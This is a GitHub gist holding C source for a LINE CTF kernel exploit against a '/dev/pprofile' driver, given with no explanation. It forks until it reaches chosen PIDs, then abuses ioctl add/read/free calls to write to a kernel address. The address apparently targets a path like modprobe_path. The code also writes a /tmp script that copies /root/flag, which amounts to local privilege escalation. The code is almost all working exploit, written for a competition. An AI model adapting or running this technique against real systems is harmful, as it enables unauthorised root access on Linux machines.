Created
March 21, 2021 01:04
-
-
Save sampritipanda/3ad8e88f93dd97e93f070a94a791bff6 to your computer and use it in GitHub Desktop.
LINECTF pprofile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #define CMD_ADD 32 | |
| #define CMD_FREE 64 | |
| #define CMD_READ 16 | |
| typedef struct { | |
| char* key; | |
| unsigned* output; | |
| } command; | |
| int fd; | |
| void do_write(uint64_t address, int target_pid) { | |
| int count = 0; | |
| while(1) { | |
| pid_t f = fork(); | |
| if(f == 0) { | |
| pid_t actual = getpid(); | |
| if (actual != target_pid) { | |
| exit(0); | |
| } | |
| command req; | |
| req.key = "sicemane"; | |
| for (uint64_t i = 0; i < 256; i++) { | |
| uint64_t target = 0xffffffff00000000L + (i << 24); | |
| target += address; | |
| req.output = target; | |
| int x = ioctl(fd, CMD_ADD, &req); | |
| x = ioctl(fd, CMD_READ, &req); | |
| printf("%p %d\n", target, x); | |
| x = ioctl(fd, CMD_FREE, &req); | |
| } | |
| exit(0); | |
| } | |
| else { | |
| waitpid(f, 0, 0); | |
| if (f == target_pid) { | |
| break; | |
| } | |
| } | |
| } | |
| } | |
| int main(int argc, char** argv) { | |
| uint64_t target; | |
| if (argc == 1) { | |
| target = 0; | |
| } | |
| else { | |
| sscanf(argv[1], "%llx", &target); | |
| } | |
| fd = open("/dev/pprofile", O_RDONLY); | |
| printf("%d\n", fd); | |
| system("echo -ne '#!/bin/sh\\ncat /root/flag > /sice\\n' > /tmp/a"); | |
| system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/test"); | |
| system("chmod 777 /tmp/*"); | |
| do_write(0x1256f40 - 8, 29743); | |
| do_write(0x1256f40 - 8 + 2, 28781); | |
| do_write(0x1256f40 - 8 + 4, 24879); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment